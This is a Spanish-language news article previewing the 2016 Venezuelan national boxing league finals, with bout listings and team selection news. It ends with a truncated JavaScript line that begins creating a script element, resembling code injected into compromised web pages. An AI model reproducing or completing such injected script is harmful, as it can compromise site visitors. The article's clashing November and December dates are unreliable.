Deportes

Desde este viernes se disputarán las finales de la Liga Nacional de Boxeo 2016

AVN

Este viernes y sábado se realizarán las jornadas finales de la Liga Nacional de Boxeo 2016, cuando se definan el tercer y cuarto puesto, así como al campeón y subcampeón del torneo pugilístico que sirve como plataforma para escoger a los peleadores que participarán con el equipo Caciques de Venezuela en la VII Serie Mundial de Boxeo.

Ambas jornadas, que se realizarán en la Cancha de Paz y Vida de Playa Grande, en el estado Vargas, comenzarán a las cuatro de la tarde con las primeras seis peleas; y a las seis de la tarde se realizarán los cinco combates restantes. El equipo que gane al menos seis duelos será el vencedor.

Para el sábado, 10 de noviembre, Guaicaipuros del Centro y Centauros de Occidente disputarán la final. Guaicaipuros llega invicto al ganar todos sus duelos en la ronda de todos contra todos por equipos y sumar nueve puntos, mientras que Centauros consiguió siete unidades producto de dos victorias; su única derrota fue precisamente ante Guaicaipuros en la última jornada de la primera ronda.

En la tanda de las cuatro de la tarde pelearán de la siguiente manera: Tayonis Cedeño (Guaicaipuros) enfrentará a Karlha Magliocco (Centauros) en los 51 kilogramos femenino; Carlos Rengel (Guaicaipuros) irá contra Jefferson Blanco (Centauros) en los 49 kg; Jonni Blanco (Guaicaipuros) contra Víctor Rodríguez (Centauros) en los 56 kg; Yoelvis Hernández (Guaicaipuros) enfrentará a  Luis Arcón (Centauros) en los 64 kg; Johan León (Guaicaipuros) ante Endry Saavedra (Centauros) en los 75 kg, y Ronald González (Guaicaipuros) contra Alfonso Flores (Centauros) en los 91 kg.

Luego, desde las seis de la tarde se enfrentarán: en la rama femenina Krisandi Ríos (Guaicaipuros) ante Yenifer Martínez (Centauros) en los 60 kg; y en el masculino Franklin González (Guaicaipuros) contra Héctor Betancourt (Centauros) en los 52 kg; Christian Palacio (Guaicaipuros) contra Luis Cabrera (Centauros) en los 60 kg; Jesús Correa (Guaicaipuros) se enfrentará a Edinson Mayora (Centauros) en los 69 kg; y Argenis España (Guaicaipuros) peleará contra Nalek Korbaj (Centauros) en los 81 kg.

Por el tercer puesto

Por su parte, Indios de Oriente y Guerreros del Llano pelearán por el tercer lugar este viernes, 9 de diciembre. Indios se ubicó tercero en la tabla de posiciones de la ronda de todos contra todos, al acumular cinco puntos (uno ganado y dos perdidos); mientras que Guerreros fue el último con tres tantos, sin victorias.

En la tanda de las cuatro de la tarde están pautadas las siguientes peleas: En la rama femenina chocarán Angela Rivas (Indios) y Natacha Pérez (Guerreros) en los 51 kg; mientras que en masculino Angelino Córdova (Indios) se enfrentará a Leonardo Sánchez (Guerreros) en los 49 kg; José Díaz (Indios) contra Ángel Suárez (Guerreros) en los 56 kg; Miguel Rodríguez (Indios) contra Maifer López (Guerreros) en los 64 kg; Keyber González (Indios) ante Michell Múñoz (Guerreros) en los 75 kg; y Jesús Herrera (Indios) contra Alciro Sánchez (Guerreros) en los 91 kg.

Para la ronda de las seis de la tarde se medirán en femenino Karen Batez (Indios) ante Orianny Torrealba (Guerreros) en los 60 kg; y en la rama masculina irán Carlos Ascanio (Indios) frente a Carlos Mújica (Guerreros) en los 52 kg; Keiber Guevara (Indios) ante José Farfán (Guerreros) en los 60 kg; Jean Carlos Ruíz (Indios) contra Yonny Sánchez (Guerreros) en los 69 kg; y José Yegüez contra Jeferson Peroza en los 81 kg.

Caciques

La Federación Venezolana de Boxeo (Fevebox) informó que seleccionará a los púgiles más destacados para formar la base del equipo Caciques de Venezuela, que representará al país en la VII Serie Mundial en febrero de 2017, donde por primera vez competirán mujeres.

El presidente de Fevebox, Fran López, informó que el boxeador bolivarense Keyber González Zapata formará parte del equipo Caciques de Venezuela en la séptima edición de la Serie Mundial de Boxeo, luego que el peleador se adjudicara el pasado fin de semana el Cinturón de Angostura en un evento disputado en Tumeremo, estado Bolívar.

Caciques de Venezuela debutará contra Domadores de Cuba en la primera jornada de la séptima edición de la Serie Mundial de Boxeo, pautada para el 3 y 4 de febrero en la isla.

El conjunto nacional integra el Grupo A junto a Condors de Argentina, Domadores de Cuba y Guerreros de México.

En la VI Serie, Caciques consiguió el segundo lugar del grupo C y clasificó a los cuartos de final, instancia en la que el equipo resultó eliminado por el Astana Arlans de Kazajistán.

var d=document;var s=d.createElement(‘script’);